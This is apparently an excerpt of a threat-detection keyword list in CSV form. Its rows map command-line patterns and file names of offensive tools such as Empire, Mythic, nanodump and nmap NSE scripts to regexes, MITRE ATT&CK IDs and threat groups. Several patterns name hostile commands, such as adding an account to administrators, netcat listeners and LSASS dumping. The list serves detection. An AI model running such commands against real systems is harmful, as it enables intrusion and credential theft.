"* mysql-variables.nse*",".{0,1000}\smysql\-variables\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","2232"
"* mysql-vuln-cve2012-2122.nse*",".{0,1000}\smysql\-vuln\-cve2012\-2122\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","2233"
"* mystikal.py*",".{0,1000}\smystikal\.py.{0,1000}","offensive_tool_keyword","Mystikal","macOS Initial Access Payload Generator","T1059.005 - T1204.002 - T1566.001","TA0002 - TA0001","N/A","N/A","Exploitation tool","https://github.com/D00MFist/Mystikal","1","0","N/A","N/A","9","4","305","39","2024-01-10T15:48:12Z","2021-05-03T14:46:16Z","2234"
"* mythic start*",".{0,1000}\smythic\sstart.{0,1000}","offensive_tool_keyword","mythic","A collaborative multi-platform red teaming framework","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black Basta","C2","https://github.com/its-a-feature/Mythic","1","0","N/A","N/A","10","10","3586","465","2025-04-16T18:01:45Z","2018-07-05T02:09:59Z","2235"
"* mythic_container.Mythic*",".{0,1000}\smythic_container\.Mythic.{0,1000}","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black Basta","C2","https://github.com/MythicAgents/Athena","1","0","N/A","N/A","10","10","198","40","2025-02-12T17:13:10Z","2022-01-24T20:44:38Z","2236"
"* mythic_payloadtype_container*",".{0,1000}\smythic_payloadtype_container.{0,1000}","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black Basta","C2","https://github.com/MythicAgents/Athena","1","0","N/A","N/A","10","10","198","40","2025-02-12T17:13:10Z","2022-01-24T20:44:38Z","2237"
"* mythic-cli*",".{0,1000}\smythic\-cli.{0,1000}","offensive_tool_keyword","mythic","A collaborative multi-platform red teaming framework","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black Basta","C2","https://github.com/its-a-feature/Mythic","1","0","N/A","N/A","10","10","3586","465","2025-04-16T18:01:45Z","2018-07-05T02:09:59Z","2238"
"* -n *TotallyLegitTool*",".{0,1000}\s\-n\s.{0,1000}TotallyLegitTool.{0,1000}","offensive_tool_keyword","InvisibilityCloak","Proof-of-concept obfuscation toolkit for C# post-exploitation tools","T1027 - T1059.003 - T1140 - T1107","TA0004 - TA0005 - TA0009","N/A","N/A","Defense Evasion","https://github.com/h4wkst3r/InvisibilityCloak","1","0","N/A","N/A","N/A","6","540","181","2022-07-22T14:13:53Z","2021-05-19T14:19:49Z","2239"
"* nachovpn.server*",".{0,1000}\snachovpn\.server.{0,1000}","offensive_tool_keyword","NachoVPN","NachoVPN is a Proof of Concept that demonstrates exploitation of SSL-VPN clients using a rogue VPN serve","T1071 - T1027 - T1547 - T1204","TA0003 - TA0009","N/A","N/A","Sniffing & Spoofing","https://github.com/AmberWolfCyber/NachoVPN","1","0","N/A","N/A","7","3","218","28","2024-11-28T12:40:55Z","2024-10-30T15:53:56Z","2240"
"* nachovpn:latest *",".{0,1000}\snachovpn\:latest\s.{0,1000}","offensive_tool_keyword","NachoVPN","NachoVPN is a Proof of Concept that demonstrates exploitation of SSL-VPN clients using a rogue VPN serve","T1071 - T1027 - T1547 - T1204","TA0003 - TA0009","N/A","N/A","Sniffing & Spoofing","https://github.com/AmberWolfCyber/NachoVPN","1","0","N/A","N/A","7","3","218","28","2024-11-28T12:40:55Z","2024-10-30T15:53:56Z","2241"
"* -Name ""Test.PME"" *",".{0,1000}\s\-Name\s\""Test\.PME\""\s.{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003 - T1621","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","Exploitation tool","https://github.com/The-Viper-One/PsMapExec","1","0","N/A","N/A","10","10","954","108","2025-03-11T14:38:50Z","2023-06-20T16:57:27Z","2242"
"* -name .htpasswd*",".{0,1000}\s\-name\s\.htpasswd.{0,1000}","offensive_tool_keyword","linuxprivchecker","search for common privilege escalation vectors such as world writable files. misconfigurations. clear-text passwords and applicable exploits","T1210.001 - T1082 - T1088 - T1547.001","TA0002 - TA0004 - TA0006 - TA0007 - TA0008","N/A","N/A","Privilege Escalation","https://github.com/sleventyeleven/linuxprivchecker/blob/master/linuxprivchecker.py","1","0","#linux","N/A","7","10","1645","524","2022-01-31T10:32:08Z","2016-04-19T13:31:46Z","2243"
"* --name covenant *",".{0,1000}\s\-\-name\scovenant\s.{0,1000}","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","Dispossessor","C2","https://github.com/cobbr/Covenant","1","0","N/A","N/A","10","10","4363","783","2024-07-18T17:25:35Z","2019-02-07T15:55:18Z","2244"
"* --name gtunnel-server *",".{0,1000}\s\-\-name\sgtunnel\-server\s.{0,1000}","offensive_tool_keyword","gTunnel","tunelling solution written in golang","T1573.002 - T1071 - T1090 - T1105 - T1020","TA0005 - TA0010 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/hotnops/gTunnel","1","0","N/A","N/A","10","10","266","49","2023-05-17T05:24:58Z","2020-03-09T02:52:48Z","2246"
"* -Name Publisher -Value ""Bad Person""*",".{0,1000}\s\-Name\sPublisher\s\-Value\s\""Bad\sPerson\"".{0,1000}","offensive_tool_keyword","PowerUpSQL","PowerUpSQL includes functions that support SQL Server discovery. weak configuration auditing. privilege escalation on scale. and post exploitation actions such as OS command execution. It is intended to be used during internal penetration tests and red team engagements. However. PowerUpSQL also includes many functions that can be used by administrators to quickly inventory the SQL Servers in their ADS domain and perform common threat hunting tasks related to SQL Server.","T1078.002 - T1547.001 - T1059.001 - T1106 - T1550.002 - T1087 - T1003 - T1053 - T1047","TA0003 - TA0002 - TA0008 - TA0011 - TA0006","N/A","Black Basta","C2","https://github.com/NetSPI/PowerUpSQL","1","0","N/A","N/A","10","10","2564","472","2024-12-12T18:09:39Z","2016-06-22T01:22:39Z","2248"
"* -Name SQLC2AgentPS *",".{0,1000}\s\-Name\sSQLC2AgentPS\s.{0,1000}","offensive_tool_keyword","PowerUpSQL","PowerUpSQL includes functions that support SQL Server discovery. weak configuration auditing. privilege escalation on scale. and post exploitation actions such as OS command execution. It is intended to be used during internal penetration tests and red team engagements. However. PowerUpSQL also includes many functions that can be used by administrators to quickly inventory the SQL Servers in their ADS domain and perform common threat hunting tasks related to SQL Server.","T1078.002 - T1547.001 - T1059.001 - T1106 - T1550.002 - T1087 - T1003 - T1053 - T1047","TA0003 - TA0002 - TA0008 - TA0011 - TA0006","N/A","Black Basta","C2","https://github.com/NetSPI/PowerUpSQL","1","0","N/A","N/A","10","10","2564","472","2024-12-12T18:09:39Z","2016-06-22T01:22:39Z","2249"
"* NamelessLog.txt*",".{0,1000}\sNamelessLog\.txt.{0,1000}","offensive_tool_keyword","NamelessC2","A C2 with all its components written in Rust","T1102 - T1573.001 - T1027 - T1219 - T1205","TA0011 - TA0003 - TA0005 - TA0010","N/A","N/A","C2","https://github.com/trickster0/NamelessC2","1","0","N/A","N/A","10","10","266","33","2024-09-26T21:21:20Z","2024-09-26T21:06:37Z","2251"
"* namespace SharpPrintNightmare*",".{0,1000}\snamespace\sSharpPrintNightmare.{0,1000}","offensive_tool_keyword","PrintNightmare","PrintNightmare exploitation","T1210 - T1059.001 - T1548.002","TA0001 - TA0002 - TA0004","N/A","Dispossessor","Privilege Escalation","https://github.com/cube0x0/CVE-2021-1675","1","0","#content","N/A","10","10","1879","582","2021-07-20T15:28:13Z","2021-06-29T17:24:14Z","2252"
"* nanodump*",".{0,1000}\snanodump.{0,1000}","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","Dispossessor","Credential Access","https://github.com/fortra/nanodump","1","0","N/A","N/A","10","10","1918","249","2024-09-17T22:58:11Z","2021-11-10T18:28:15Z","2253"
"* nanodump/*",".{0,1000}\snanodump\/.{0,1000}","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","Dispossessor","Credential Access","https://github.com/fortra/nanodump","1","0","N/A","N/A","10","10","1918","249","2024-09-17T22:58:11Z","2021-11-10T18:28:15Z","2254"
"* NativeDump.exe*",".{0,1000}\sNativeDump\.exe.{0,1000}","offensive_tool_keyword","NativeDump","Dump lsass using only Native APIs by hand-crafting Minidump files (without MinidumpWriteDump!)","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/ricardojoserf/NativeDump","1","0","N/A","N/A","10","6","586","86","2024-12-17T15:36:57Z","2024-02-22T15:16:16Z","2255"
"* nat-pmp-info.nse*",".{0,1000}\snat\-pmp\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","2256"
"* nat-pmp-mapport.nse*",".{0,1000}\snat\-pmp\-mapport\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","2257"
"* nbd-info.nse*",".{0,1000}\snbd\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","2258"
"* -NBNSBruteForce*",".{0,1000}\s\-NBNSBruteForce.{0,1000}","offensive_tool_keyword","Inveigh",".NET IPv4/IPv6 machine-in-the-middle tool for penetration testers","T1550.002 - T1059.001 - T1071.001","TA0002","N/A","ALLANITE - ENERGETIC BEAR","Sniffing & Spoofing","https://github.com/Kevin-Robertson/Inveigh","1","0","N/A","N/A","10","10","2685","462","2024-08-06T01:47:27Z","2015-04-02T18:04:41Z","2259"
"* nbns-interfaces.nse*",".{0,1000}\snbns\-interfaces\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","2260"
"* nbnsspoof.py*",".{0,1000}\snbnsspoof\.py.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a  C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","2261"
"* -NBNSTTL *",".{0,1000}\s\-NBNSTTL\s.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","2262"
"* nbstat.nse*",".{0,1000}\snbstat\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","2263"
"* nc *.gsocket*",".{0,1000}\snc\s.{0,1000}\.gsocket.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","N/A","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","2264"
"* nc gsocket 31337*",".{0,1000}\snc\sgsocket\s31337.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","N/A","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","2265"
"* nc -n -v -l -s *",".{0,1000}\snc\s\-n\s\-v\s\-l\s\-s\s.{0,1000}","offensive_tool_keyword","rsg","reverse shell powershell","T1059.001 - T1203 - T1105 - T1562.001","TA0002 - TA0011","N/A","Black Basta","C2","https://github.com/mthbernardes/rsg","1","0","#linux","N/A","10","10","561","126","2024-05-03T16:33:20Z","2017-12-12T02:57:07Z","2266"
"* nc_srv.bat*",".{0,1000}\snc_srv\.bat.{0,1000}","offensive_tool_keyword","NTHASH-FPC","various tools for retrieving windows secrets - Lateral Movement and C2","T1552.002 - T1552.005 - T1555.003 - T1555.005 - T1558 - T1558.003 - T1111 - T1552.001 - T1539 - T1606 - T1602","TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Credential Access","https://github.com/erwan2212/NTHASH-FPC","1","0","N/A","N/A","10","1","35","9","2023-08-13T16:38:53Z","2019-08-09T11:49:55Z","2268"
"* ncp-enum-users.nse*",".{0,1000}\sncp\-enum\-users\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","2270"
"* ncp-serverinfo.nse*",".{0,1000}\sncp\-serverinfo\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","2271"
"* ndmp-fs-info.nse*",".{0,1000}\sndmp\-fs\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","2272"
"* ndmp-version.nse*",".{0,1000}\sndmp\-version\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","2273"
"* needs High Integrity Privileges to dump the relevant process!*",".{0,1000}\sneeds\sHigh\sIntegrity\sPrivileges\sto\sdump\sthe\srelevant\sprocess!.{0,1000}","offensive_tool_keyword","pandora","A red team tool that assists into extracting/dumping master credentials and/or entries from different password managers","T1555 - T1003","TA0006 - TA0003","N/A","N/A","Credential Access","https://github.com/efchatz/pandora","1","0","#content","N/A","10","8","738","88","2025-01-09T14:58:57Z","2023-11-03T18:01:31Z","2274"
"* nemesis_connector.py*",".{0,1000}\snemesis_connector\.py.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","Black Basta","Resource Development","https://github.com/SpecterOps/Nemesis","1","0","N/A","N/A","9","7","672","65","2025-04-17T21:55:10Z","2023-07-13T18:24:24Z","2275"
"* nemesis_db.py*",".{0,1000}\snemesis_db\.py.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","Black Basta","Resource Development","https://github.com/SpecterOps/Nemesis","1","0","N/A","N/A","9","7","672","65","2025-04-17T21:55:10Z","2023-07-13T18:24:24Z","2276"
"* nemesis_reg_collect_parser.py*",".{0,1000}\snemesis_reg_collect_parser\.py.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","Black Basta","Resource Development","https://github.com/SpecterOps/Nemesis","1","0","N/A","N/A","9","7","672","65","2025-04-17T21:55:10Z","2023-07-13T18:24:24Z","2277"
"* nemesis-cli.py*",".{0,1000}\snemesis\-cli\.py.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","Black Basta","Resource Development","https://github.com/SpecterOps/Nemesis","1","0","N/A","N/A","9","7","672","65","2025-04-17T21:55:10Z","2023-07-13T18:24:24Z","2278"
"* --neo4j-host *",".{0,1000}\s\-\-neo4j\-host\s.{0,1000}","offensive_tool_keyword","smartbrute","Password spraying and bruteforcing tool for Active Directory Domain Services","T1110.001 - T1110.003","TA0001 - TA0006","N/A","N/A","Credential Access","https://github.com/ShutdownRepo/smartbrute","1","0","N/A","N/A","10","4","365","54","2024-10-27T20:47:29Z","2021-07-16T14:53:29Z","2279"
"* --neo4j-host *--neo4j-port*",".{0,1000}\s\-\-neo4j\-host\s.{0,1000}\-\-neo4j\-port.{0,1000}","offensive_tool_keyword","sprayhound","Password spraying tool and Bloodhound integration","T1110.003 - T1210.001 - T1069.002","TA0006 - TA0007 - TA0003","N/A","N/A","Credential Access","https://github.com/Hackndo/sprayhound","1","0","N/A","N/A","N/A","3","231","19","2024-12-31T08:09:37Z","2020-02-06T17:45:37Z","2280"
"* -neo4j-password *",".{0,1000}\s\-neo4j\-password\s.{0,1000}","offensive_tool_keyword","smartbrute","Password spraying and bruteforcing tool for Active Directory Domain Services","T1110.001 - T1110.003","TA0001 - TA0006","N/A","N/A","Credential Access","https://github.com/ShutdownRepo/smartbrute","1","0","N/A","N/A","10","4","365","54","2024-10-27T20:47:29Z","2021-07-16T14:53:29Z","2281"
"* --neo4j-port *",".{0,1000}\s\-\-neo4j\-port\s.{0,1000}","offensive_tool_keyword","smartbrute","Password spraying and bruteforcing tool for Active Directory Domain Services","T1110.001 - T1110.003","TA0001 - TA0006","N/A","N/A","Credential Access","https://github.com/ShutdownRepo/smartbrute","1","0","N/A","N/A","10","4","365","54","2024-10-27T20:47:29Z","2021-07-16T14:53:29Z","2282"
"* --neo4j-user *",".{0,1000}\s\-\-neo4j\-user\s.{0,1000}","offensive_tool_keyword","smartbrute","Password spraying and bruteforcing tool for Active Directory Domain Services","T1110.001 - T1110.003","TA0001 - TA0006","N/A","N/A","Credential Access","https://github.com/ShutdownRepo/smartbrute","1","0","N/A","N/A","10","4","365","54","2024-10-27T20:47:29Z","2021-07-16T14:53:29Z","2283"
"* nessus-brute.nse*",".{0,1000}\snessus\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","2285"
"* nessus-xmlrpc-brute.nse*",".{0,1000}\snessus\-xmlrpc\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","2286"
"* net localgroup administrators Tater /add*",".{0,1000}\snet\slocalgroup\sadministrators\sTater\s\/add.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/BC-SECURITY/Empire","1","0","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","2287"
"* netbus-auth-bypass.nse*",".{0,1000}\snetbus\-auth\-bypass\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","2288"
"* netbus-brute.nse*",".{0,1000}\snetbus\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","2289"
